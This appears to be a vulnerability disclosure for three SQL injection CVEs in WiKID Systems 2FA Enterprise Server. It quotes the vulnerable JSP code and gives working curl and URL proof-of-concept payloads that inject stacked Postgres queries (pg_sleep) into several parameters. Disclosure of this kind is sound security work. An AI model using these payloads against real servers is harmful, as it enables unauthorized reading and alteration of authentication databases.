A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047.
A SQL Injection vulnerability, CVE-2019-16917, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2047. The uid and domain parameters, used by searchDevices.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete information in the database.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032 and disclosed to WiKID Systems.The source code for searchDevices.jsp reveals the buildSearchWhereClause. The uid and domain parameters are retrieved in the buildSearchWhereClause function:
191 private void buildSearchWhereClause(HttpServletRequest request) {
192 where = "";
193 String uid=request.getParameter("uid");194 String domain=request.getParameter("domain");
If the domain parameter is set and uid parameter is not set, domain is included, in the query allowing SQL injection here:
203 }else if(!domain.equals("0") && uid==null){
204 where="where domainid="+domain;
If the uid parameter is set, the domain parameter is included, in the query allowing SQL injection here:
205 }else if(uid!=null){
...
214 if(!domain.equals("0")){
215 where=where+" and domainid="+domain;
216 }
217 }
218 }
The backend database is Postgres which supports Stacked Queries. A value such as 1; select pg_sleep(10);-- will cause the database and application will hang for 10+ seconds, the original query will execute followed a second query to sleep for 10 seconds:
SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp
If the uid parameter is set, the logic drops down to following block where the uid parameter is included in the query:
205 }else if(uid!=null){
206 uid=uid.toLowerCase().trim();
207 String ask=uid.substring(uid.length()-1);
208 if(ask!=null ){
209 // uid=uid.substring(0,uid.length()-1);
210 where="where RTRIM(LOWER(userid)) like LOWER('%"+uid+"%')";
211 // }else{
212 // where="where RTRIM(LOWER(userid))=LOWER('"+uid+"')";
213 }
A request, such as the following, will trigger the issue, causing the application to delay for 10+ seconds:
SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X 'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary "uid=1;select pg_sleep($SLEEP);--&action=Search" https://$HOST/WiKIDAdmin/searchDevices.jsp
A SQL Injection vulnerability, CVE-2019-17117, was identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The key parameter, used in processPref.jsp, is not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032The source code for processPref.jsp reveals the following code block:
121 } else if (request.getParameter("action").equals("Update")) {
122 // need to do error checking here.
123 sql = "SELECT key FROM parms1to1 where key='" + request.getParameter("key") + "'";
124 ResultSet result = stat.executeQuery(sql);
125 if (!result.next()) {
126 %>
If the action parameter is set to Update, the key parameter is included in a SQL query used to retrieve the Parameter that will be updated. The key parameter is not sanitized before it is included in the query. A request such as:
https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);--
Will cause the application to delay for at least 5 seconds.
Multiple SQL Injection vulnerabilities, CVE-2019-17119, were identified on WiKID Systems 2FA Enterprise Server through version 4.2.0-b2053. The substring and source parameters, used by Logs.jsp, are not sanitized before being included in a SQL query thus allowing an authenticated user to create, read, update, or delete arbitrary information in the database.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032The source code for Logs.jsp reveals the following logic:
192 private String createSourceFilter(HttpServletRequest request) {
193 String source = getLogConfig(request).get("source");
194 if (source == null || "None".equals(source)) {
195 return " ";
196 }
197 return " and logger_name = '" + source + "' ";
198 }
199
200 private String createSubStringFilter(HttpServletRequest request) {
201 String subString = getLogConfig(request).get("subString");
202 if (subString == null || subString.trim().length() == 0) {
203 return " ";
204 }
205 return " and rendered_message like '%" + subString + "%' ";
206 }
createSourceFilter reads the source parameter and includes the value in a query being constructed;createSubStringFilter reads the substring parameter and includes the value in a query that is being constructed.
The following queries can be used to demonstrate the parameters are vulnerable, the queries take advantage of Stacked Queries in Postgres; a secondary request is issued that causes the database and application to delay for 5+ seconds:
time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "source='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp
real 0m10.572s
user 0m0.008s
sys 0m0.016stime curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE" --data-binary "subString='; select pg_sleep(5);--" https://$RHOST/WiKIDAdmin/Log.jsp
real 0m10.572s
user 0m0.008s
sys 0m0.016s
.svg)